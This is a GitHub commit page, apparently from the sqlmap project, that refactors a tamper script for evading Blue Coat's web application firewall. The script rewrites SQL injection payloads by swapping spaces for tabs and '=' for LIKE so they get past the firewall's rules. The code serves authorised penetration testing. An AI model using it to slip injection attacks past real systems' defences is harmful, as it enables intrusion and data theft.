Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 5352b3e

Browse files
stamparmstamparm
committed
Refactoring code in tamper/bluecoat.py
1 parent d75598f commit 5352b3e

1 file changed

Lines changed: 14 additions & 23 deletions

File tree

tamper/bluecoat.py

Lines changed: 14 additions & 23 deletions
Original file line numberDiff line numberDiff line change
@@ -12,44 +12,35 @@
1212
from lib.core.enums import DBMS
1313
from lib.core.enums import PRIORITY
1414

15-
__priority__ = PRIORITY.LOW
15+
__priority__ = PRIORITY.NORMAL
1616

1717
def dependencies():
1818
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
1919

20-
def process(match):
21-
word = match.group()
22-
word = "%sLIKE%s" % (" " if word[0] != " " else "", " " if word[-1] != " " else "")
23-
return word
24-
2520
def tamper(payload, headers=None):
26-
"""
27-
First Replaces the space after 'select ' with a valid random blank character.
28-
Then replace = with like
21+
"""
22+
Replaces space character after SQL statement with a valid random blank character.
23+
Afterwards replace character = with LIKE operator
2924
3025
Example:
3126
* Input: SELECT id FROM users where id = 1
32-
* Output: SELECT%09id FROM users where id like 1
27+
* Output: SELECT%09id FROM users where id LIKE 1
3328
3429
Requirement:
35-
* MySQL, Bluecoat SGos with Waf activated as documented in
30+
* MySQL, Blue Coat SGOS with WAF activated as documented in
3631
https://kb.bluecoat.com/index?page=content&id=FAQ2147
3732
3833
Tested against:
39-
* MySQL 5.1, SGos Rules
34+
* MySQL 5.1, SGOS
4035
4136
Notes:
42-
* Useful to bypass BlueCoat recommanded Waf rule configuration
43-
"""
37+
* Useful to bypass Blue Coat's recommended WAF rule configuration
38+
"""
4439

45-
# ASCII table:
46-
# TAB 09 horizontal TAB
47-
blanks = '%09'
48-
retVal = payload
40+
retVal = payload
4941

50-
if payload:
51-
for commands in ['SELECT','UPDATE','INSERT','DELETE']:
52-
retVal = retVal.replace(commands + ' ', commands + blanks)
53-
retVal = re.sub(r"\s*=\s*", lambda match: process(match), retVal)
42+
if payload:
43+
retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)\s+", r"\g<1>\t", payload)
44+
retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
5445

55-
return retVal
46+
return retVal

0 commit comments

Comments
 (0)